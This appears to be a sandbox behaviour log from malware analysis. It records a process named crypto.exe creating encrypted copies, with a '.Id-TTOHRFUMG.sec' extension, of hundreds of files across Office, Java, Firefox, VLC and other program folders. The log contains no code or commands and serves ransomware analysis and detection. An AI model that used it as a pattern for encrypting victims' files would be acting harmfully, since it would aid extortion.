File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386270.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\librawdv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00297_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Adobe.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBHD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Cambridge_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\CERTINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\ODBCR.SAM.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR2B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\sound.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0217262.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SCHOL_02.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0211949.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285410.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_TexturedBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\vcruntime140.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\SpaceSelector.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00164_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\LAUNCH.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\London.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00077_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIDBAR98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sv.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Hardcover.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341634.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_LightSpirit.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RECL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGREPFRM.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libreal_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\Words.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Bissau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl-hot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBAR.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0202045.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107146.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\swiftshader\libEGL.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Yellowknife.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00052_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00267_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00468_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\firefox.exe.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kolkata.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLIP.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0305493.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD10290_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\AUDIOSEARCHMAIN.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01163_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ApothecaryMergeLetter.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Synchronization Services\ADO.NET\v1.0\Microsoft.Synchronization.Data.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\awt.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21480_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OFFLINE.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NL7Data0011.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\EET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_10.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02752G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\TURABIAN.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\verify.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157831.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18214_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_150.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\7zFM.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\play-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\cacerts.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Uninstall.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Kuala_Lumpur.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216570.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21482_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\1 Right.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\Tabs.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\af.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18185_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2launcher.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00146_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0293832.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Macau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBTRAP.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Fancy.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NL7Lexicons0011.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libaudio_format_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-today.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10264_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\java.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01770_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-api-caching.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02039_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Paper.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\plugin-container.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-disable.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EXLIRMV.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00190_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\ODBC.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\SIGNHM.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107734.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSProxy.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART12.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_rainy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10268_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0136865.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153313.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18235_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\TOOT.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172035.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00902_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00202_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\localizedSettings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passportcover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15134_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21422_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSOUC.HXS.Id-TTOHRFUMG.sec	crypto.exe
